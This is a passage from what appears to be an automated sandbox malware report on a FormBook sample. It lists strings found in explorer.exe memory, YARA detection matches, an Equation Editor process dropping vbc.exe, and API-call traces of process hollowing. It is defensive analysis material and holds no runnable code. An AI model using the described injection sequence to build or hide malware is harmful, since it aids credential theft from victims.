          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000008.00000000.2198730467.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2196291605.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000008.00000000.2196291605.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: vbc.exe, 00000004.00000002.2195649466.00000000064A0000.00000002.00000001.sdmp, RegAsm.exe, 00000006.00000002.2219630675.0000000002120000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2189359116.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2196291605.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara matchFile source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.510000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.510000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.510000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.510000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\choice.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\choice.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXEMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXEMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002F00AD NtOpenSection,NtMapViewOfSection,4_2_002F00AD
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002F1C09 CreateProcessW,NtQueryInformationProcess,NtReadVirtualMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtTerminateProcess,NtUnmapViewOfSection,NtWriteVirtualMemory,NtSetContextThread,NtResumeThread,4_2_002F1C09
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00419D50 NtCreateFile,6_2_00419D50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00419E00 NtReadFile,6_2_00419E00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00419E80 NtClose,6_2_00419E80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00419F30 NtAllocateVirtualMemory,6_2_00419F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00419D4B NtCreateFile,6_2_00419D4B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00419DFE NtReadFile,6_2_00419DFE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00419DA4 NtCreateFile,6_2_00419DA4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00419E7A NtClose,6_2_00419E7A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00419F2B NtAllocateVirtualMemory,6_2_00419F2B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02530048 NtProtectVirtualMemory,LdrInitializeThunk,6_2_02530048
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02530078 NtResumeThread,LdrInitializeThunk,6_2_02530078
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025300C4 NtCreateFile,LdrInitializeThunk,6_2_025300C4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_0252FAD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FAE8 NtQueryInformationProcess,LdrInitializeThunk,6_2_0252FAE8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FB68 NtFreeVirtualMemory,LdrInitializeThunk,6_2_0252FB68
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FBB8 NtQueryInformationToken,LdrInitializeThunk,6_2_0252FBB8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252F900 NtReadFile,LdrInitializeThunk,6_2_0252F900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252F9F0 NtClose,LdrInitializeThunk,6_2_0252F9F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_0252FED0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FEA0 NtReadVirtualMemory,LdrInitializeThunk,6_2_0252FEA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FFB4 NtCreateSection,LdrInitializeThunk,6_2_0252FFB4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FC60 NtMapViewOfSection,LdrInitializeThunk,6_2_0252FC60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FC90 NtUnmapViewOfSection,LdrInitializeThunk,6_2_0252FC90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FDC0 NtQuerySystemInformation,LdrInitializeThunk,6_2_0252FDC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FD8C NtDelayExecution,LdrInitializeThunk,6_2_0252FD8C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02530060 NtQuerySection,6_2_02530060
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025310D0 NtOpenProcessToken,6_2_025310D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02531148 NtOpenThread,6_2_02531148
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0253010C NtOpenDirectoryObject,6_2_0253010C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025301D4 NtSetValueKey,6_2_025301D4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_025307AC NtCreateMutant,6_2_025307AC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FA50 NtEnumerateValueKey,6_2_0252FA50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FA20 NtQueryInformationFile,6_2_0252FA20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FAB8 NtQueryValueKey,6_2_0252FAB8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FB50 NtCreateKey,6_2_0252FB50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FBE8 NtQueryVirtualMemory,6_2_0252FBE8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252F8CC NtWaitForSingleObject,6_2_0252F8CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02531930 NtSetContextThread,6_2_02531930
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252F938 NtWriteFile,6_2_0252F938
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FE24 NtWriteVirtualMemory,6_2_0252FE24
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FF34 NtQueueApcThread,6_2_0252FF34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FFFC NtCreateProcessEx,6_2_0252FFFC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02530C40 NtGetContextThread,6_2_02530C40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FC48 NtSetInformationFile,6_2_0252FC48
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FC30 NtOpenProcess,6_2_0252FC30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0252FD5C NtEnumerateKey,6_2_0252FD5C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02531D80 NtSuspendThread,6_2_02531D80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_008B9862 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,6_2_008B9862
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_008B9DAE NtResumeThread,NtClose,6_2_008B9DAE
